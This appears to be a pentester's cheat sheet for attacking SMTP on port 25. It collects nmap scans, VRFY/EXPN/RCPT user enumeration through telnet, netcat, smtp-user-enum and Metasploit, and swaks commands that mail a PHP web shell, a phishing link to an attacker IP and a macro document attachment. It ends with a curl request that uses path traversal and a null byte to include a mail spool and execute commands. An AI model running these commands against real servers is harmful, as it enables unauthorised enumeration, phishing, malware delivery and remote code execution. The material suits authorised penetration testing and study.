Skip to content

25 - Pentesting smtp

SMTP stands for "Simple Mail Transfer Protocol". It is a protocol used for sending email messages between servers. Most email systems that send mail over the Internet use SMTP to send messages from one server to another, and to deliver messages to local mail clients like Microsoft Outlook or Apple Mail. SMTP servers listen for incoming mail, and then use other protocols to deliver the message to the recipient's mailbox.

nmap


nmap -p 25 -sV -sC -Pn -vv $IP

telnet - (user enumeration)


telnet $IP 25
|<- VRFY root
|<- VRFY szalek
|<- VRFY admin
|<- VRFY msfadmin

netcat - (user enumeration)


netcat $IP 25
|<- VRFY root
|<- VRFY szalek
|<- VRFY admin
|<- VRFY msfadmin

smtp-user-enum - (user enumeration)


sudo apt install smtp-user-enum
smtp-user-enum -M VRFY -U /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -t $IP
smtp-user-enum -M EXPN -U /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -t $IP
smtp-user-enum -M RCPT -U /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -t $IP

metasploit - (user enumeration)


use auxiliary/scanner/smtp/smtp_enum
msf auxiliary(smtp_enum) > set rhosts 10.10.200.211
msf auxiliary(smtp_enum) > set rport 25
msf auxiliary(smtp_enum) > set USER_FILE /tmp/users.txt
msf auxiliary(smtp_enum) > run

validate smtp configuration


./spoofcheck.py michalszalkowski.com 

send email / executing command


send email

swaks --to mark@localhost --from admin@michalszalkowski.com --header "EmailHacked" --body 'BodyStart <?php system($_REQUEST["cmd"]); ?> BodyEnd' --server $IP

send email

swaks --to mark@localhost --from admin@michalszalkowski.com --header "EmailHacked" --body 'BodyStart <a href="http://192.168.45.206">click me</a> BodyEnd' --server $IP

send email

swaks --to mark@localhost --from admin@michalszalkowski.com --header "EmailHacked" --body 'BodyStart File for you BodyEnd' --attach mymacro.doc --server $IP

execute

curl -k 'https://10.129.84.70/file.php?file=../../../../../../../..//var/mail/UserName%00&cmd=id'